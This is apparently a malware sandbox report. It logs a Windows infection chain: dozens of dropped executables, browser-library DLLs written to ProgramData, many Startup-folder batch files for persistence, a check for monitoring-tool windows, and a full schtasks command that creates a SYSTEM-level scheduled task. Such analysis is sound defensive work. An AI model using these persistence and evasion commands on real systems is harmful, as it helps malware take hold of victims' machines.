                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\0yHxI2NgcVq897URfu1bGLCU.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\2YL4IgWcBHinkIA211vO9Bpr.exe
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe | File created: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\ARP.EXE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\xXfU3dY2WEStW3xUEgs7rT08.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\TD0DvTWbvdprpaFzaf7f79H8.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\6iaJRQnw7XfTmk0UWiyyOxOe.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\8wsOStmCG25nWXULr6UWy2Q5.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\8Hs13Qx2L9GIxFG02dQv6hVO.exe
                        Source: C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exe | File created: C:\Users\user\AppData\Local\Temp\u624.0.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\wv3L00mTLTTnOX1S2obszDcX.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\NwvsoZspGn6vizp2axhKoY0Z.exe
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | File created: C:\Users\user\AppData\Local\Temp\u69w.1.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\timeSync[1].exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\r0DfbOvsdOtWhxCPYUgwqjYI.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\Documents\SimpleAdobe\NpXiURSjfclxWgcUlkMD5eJ8.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\NdBfL9GQKAuQALK03ZlcLnBv.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\63TGqnDkcQpbTyiukd2djP6a.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\VmjwaGr6tPcRf0rEBWGZ46z3.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\skOP6h6U62cLrOTEAXi7XUT4.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\0Flev5sTDyJ3duKpLfv5ka2Z.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\0WEfXyMPJw5gbxAkYoQ7foIu.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\9teA9V2job1p0o0lcg2CuXcR.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\ugGFIzLnD3Xk89zL7XSYeDGh.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\IsEPzSszgrCYUPQvHPDrLyFU.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\zUOgRazdYnb35XHU4UIsV9Yc.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\softokn3[1].dllJump to dropped file
                        Source: C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exeFile created: C:\Users\user\AppData\Local\Temp\u33c.1.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeFile created: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\appidpolicyconverter.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\jTODdSkaulFxtvMU8WoUUyzs.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\W7lXXTFWXeTByuMsbD5hqZaG.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\a17F4G7WEa7FlwVixhjX6uYK.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\0FR80IiNvxJZyXnpOgiDlYNV.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\Zsk2cFkeBC4UsceqkHvvw1iU.exeJump to dropped file
                        Source: C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exeFile created: C:\Users\user\AppData\Local\Temp\u46g.1.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\idw0Y68mq2UfXecINGuMfSFO.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\FQM2AbwszjT1lQzUoXGDxSTy.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\QbLPxQThjmTC7G98txUkfov6.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\1CGwy9Tr3ZgPn871BvByOPxR.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\oItrqw2PxeTCx2grDJJI9Sqg.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\W9xI9q4MOUfVc9D8gPa3VVtC.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeFile created: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeJump to dropped file
                        Source: C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exeFile created: C:\Users\user\AppData\Local\Temp\u4hg.1.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\zFZkiprzkq8Ae7mkklwscu5a.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\QV2CtvThMWBnTkQtNtmINgo7.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\5Q13Z1W5QdpwzXbxGFAdEXdB.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\t5dER7PVcN8YbrHzsawB4xKm.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\ShiCqBALVwHXuLXc8u9Hf2su.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\VgRPuj2QfERyAHULRBeO1F20.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\alB5HeuQna7ct24xMLLWf2EN.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\zWhvfqZrtT7TUoWor4gRArPv.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\aTFJoaTi8xkup68H3WyrFIbQ.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exeFile created: C:\Users\user\AppData\Local\Temp\u2r8.0.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\790489aa[1].exeJump to dropped file
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeFile created: C:\Users\user\AppData\Local\Temp\u69w.0.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\JUzoV9GxBJCDHhTcPnbRBLla.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\IWNHTSCpSFApuke51w2EhXTa.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\saftSBfOyQtbUhRB42BwTwJm.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\wDhpi03qlIbaSzF5WZoKo8eV.exeJump to dropped file
                        Source: C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exeFile created: C:\Users\user\AppData\Local\Temp\u624.1.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeFile created: C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\JUnCNhn.exeJump to dropped file
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404232137541\opera_packageJump to dropped file
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404232138021\opera_packageJump to dropped file
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240423213748763.log
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240423213755078.log

                        Boot Survival

                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fagr44gehhmhQmsmZzIfzCC2.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\er4UWRAIc5nksPtzjAlnLniT.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TVAm1QI1IkUDwXuoaPmgOaGO.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8xb4CYcBawbLerlRgmQScw49.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c30OjsA06vP0OjpHU4TSEFXy.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\INQlUc1XgC4YubLIynK9wvrP.batJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeWindow searched: window name: FilemonClass
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeWindow searched: window name: RegmonClass
                        Source: C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exeWindow searched: window name: FilemonClass
                        Source: C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                        Source: C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exeWindow searched: window name: RegmonClass
                        Source: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exeWindow searched: window name: FilemonClass
                        Source: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                        Source: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exeWindow searched: window name: RegmonClass
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeWindow searched: window name: RegmonClass
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeWindow searched: window name: FilemonClass
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                        Source: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 21:38:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe\" em /VNsite_idnLd 385118 /S" /V1 /F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ECVVQonpjDvaVVq8u9A57jpg.batJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeFile created: C:\Windows\Tasks\bWycNackLSywaqkmgR.job
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u4wmr0Bf4EXaMCuRI7IEqrEN.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JlRLEIpF3kijytHz1FaeY3WZ.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Gsl02wkLG0QjvXiDlgL1h1Gi.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JtkF0WemvMdybR3XRcsFyf1i.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchWZdT95vOpzHp7On4mxxfQ.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Zg3gHfMVLuRw8ensa1FCPDaU.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rn8SDNMr1p6wepdx6lkoczBh.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UsRuWQ7xN6FZn5at6gRKTF3B.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\A6qSF0ut9ErFpR3WVXzTlEB6.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v626yA0xMjbBDle6UIsKMxMX.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ylpTCbqw6Bd6MUStDnsoxMXB.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rVMvJuock0EvSLQr8i6oWa6o.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fagr44gehhmhQmsmZzIfzCC2.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c30OjsA06vP0OjpHU4TSEFXy.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\INQlUc1XgC4YubLIynK9wvrP.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DsmX5IKpf85YqLtUG2emopLQ.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jR7LsmZUnB4FZaCYUqyCsVgJ.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u5dGk12YYILlpzhYxk2XzgEM.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cdlcSQxWa3EiYarbRMZZXW6B.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xsTljUDyfomCxhnzNXfr7Xm9.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LlgTJb1fsKZaWWGOHpA0Z7jy.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MeUXi1xZRfgTr34geRpmygtS.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lfrK2eleGgknmu9FzWkpzB7c.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6xZdoDoBUE5p5eHQogOzmCAe.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LxHbHMNvefHp2Hvr6DcpzhYd.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KD5MxYvzde1avFdeWwU1rF85.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7BtjTi3FF9au1FQnlKymnDMg.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JBjdJ2s3yN24CmoRslMpXshQ.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6fMi9oyVvviqTTN6Wr56ISLB.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SobxUGvoTK5M02dimGqnbluB.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bzGR4bdGfx80t9z5gTXhjS5m.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oNOt66EI4etu2JX94D2Yxd2b.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ljM3vcf9uuofRJ8ARCciU76L.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F2GuBTHnmBkN3dSsucJeBkQG.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bRXCsNtemAFBshpyVJXEffxd.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BosibbTKPcpK0gAFoIDe9sCf.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1hkcRBWLeEPqv2ntphnoy15W.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oZiUKJGSA8G9xcONfqSnC56U.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\er4UWRAIc5nksPtzjAlnLniT.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TVAm1QI1IkUDwXuoaPmgOaGO.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8xb4CYcBawbLerlRgmQScw49.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UNhgzOtBFiyZVWZ3q4kFYqN6.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7lgGvzEo7nECzBG3bpAxjivM.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bbcng22Z0TSdvpG3NMlJFqMM.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WubC0DiuPPNp4xftV5ZUsBRa.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZZdfK51JZVeSwQUZVWqostT0.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKepX7TNvoxrvNCU36z69Z8U.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nqmQZESYWs8lMVQC5uSuvZGu.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\YK212xIfnETeMj8HWzSaLpXm.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dfqsmrq9YcEQ7hPoIyQgCVFc.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t1VNoyGIaOw1GtxZ1M3tjpAQ.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Yja9y4U3Z3AC8NiP5CTtr4Gt.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t5Sezk8AJ1dVCIp8NlarOJfh.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MfQYCojjZujE183iHin4yvvN.bat
